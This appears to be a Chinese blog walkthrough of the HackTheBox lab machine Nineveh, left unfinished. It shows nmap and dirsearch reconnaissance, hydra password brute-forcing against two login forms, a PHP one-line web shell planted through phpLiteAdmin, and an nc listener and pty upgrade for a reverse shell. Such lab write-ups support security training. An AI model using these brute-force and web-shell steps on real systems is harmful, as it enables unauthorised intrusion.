美文网首页
hackthebox Nineveh

hackthebox Nineveh

作者: e02f7fdbb400 | 来源:发表于2018-01-04 22:05 被阅读698次
nmap -sC -sV -oA  nmap 10.10.10.43

探测操作系统服务及相关版本,并保存为nmap.nmap.


image.png

根据ssl-cert可看到主机名。
编辑 /etc/hosts 配置ip及对应主机名

vi /etc/hosts
10.10.10.43  nineveh
image.png
image.png
image.png

HTTP协议传输的数据都是未加密的,也就是明文的,因此使用HTTP协议传输隐私信息非常不安全,为了保证这些隐私数据能加密传输,于是网景公司设计了SSL(Secure Sockets Layer)协议用于对HTTP协议传输的数据进行加密,从而就诞生了HTTPS。
简单来说,HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议,要比http协议安全。

dirsearch.py -u https://nineveh.htb -e *
dirsearch.py -u nineveh.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e *
image.png image.png
image.png

使用hydra爆破


image.png
image.png
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/10k_most_common.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/10k_most_common.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64
image.png
image.png

成功爆破到密码


image.png

未爆破到db密码 更换字典尝试

grep -i ^password /usr/shark/wordlists/rockyou.txt >pw
hydra -l admin -P pw10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64

爆破到db密码为password123,发现为phpliteadmin系统,搜索下以前的漏洞

searchsploit phpliteadmin
image.png image.png

创建新数据库并已php为扩展名,创建表写入php一句话。

<? php echo system($_REQUEST['dd']); ?>
image.png

只能重命名为ninevehNotes.php 。根据提示更改下一句话

<? php echo system($_REQUEST["dd"]); ?>
image.png

根据提示更改下一句话

<? php echo system($_REQUEST["dd"]); ?>
image.png

利用nc getshell

nc -lvpn 9999

反向shell获取参考http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

image.png
将其转换成交互式的shell,方便运行su。在终端中执行:
python -c 'import pty;pty.spawn('/bin/bash')'    

python2没有spawn,我们使用python3

python3 -c 'import pty;pty.spawn("/bin/bash")'
image.png

我们需要设置tty 保证我们在nc shell 上与终端完全交互,以便使用所有功能(tab-complete,history,job control等):

参考:如何将简单的Shell转换成为完全交互式的TTY
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/3529.html

未完待续

相关文章

  • hackthebox Nineveh

    探测操作系统服务及相关版本,并保存为nmap.nmap. 根据ssl-cert可看到主机名。编辑 /etc/hos...

  • Book of Deadly Names

    作者:Nineveh Shadrach 译者:Sigel Translation Page One Recto S...

  • 0x03-HackTheBox-Shield

    Shield Video Walkthrough!? 个人博客地址 Via今天回来继续 HackTheBox 系列...

  • hackthebox-Travel

    Travel这台靶机真的是做hackthebox以来遇到的最佳靶机了。相比之前因为pwn的知识而根本没法下手的一些...

  • hackthebox-Oouch

    Oouch靶机的难度相比最近做完的两个hard machine Quick跟Forwardslash而言有过之而无...

  • hackthebox-Intense

    纠结了好久要不要写这篇wp.最后还是打算把流程过一遍吧。首先这台靶机没料到的是开开心心做到root部分发现是个pw...

  • hackthebox-Dyplesher

    Dyplesher靶机是自己第一次完成的现役insane难度htb靶机。靶机涉及的服务相对比较多,包括web,go...

  • hackthebox-SneakyMailer

    SneakyMailer是自己在htb上完成的第30台靶机。因为特殊纪念意义加上涉及到一些很有意思的知识所以记录下...

  • HackTheBox—邀请码

    HackTheBox是一个在线的渗透测试平台,我们可以通过它锻炼自己的渗透测试水平,并与安全领域的数千名人员交流想...

  • hackthebox-Freelancer

    hackthebox的webchallenge还剩下两题。昨天晚上自己挑了那道难度相对低点的题做了下,最后还是靠中...

网友评论

      本文标题:hackthebox Nineveh

      本文链接:https://www.haomeiwen.com/subject/dlfxnxtx.html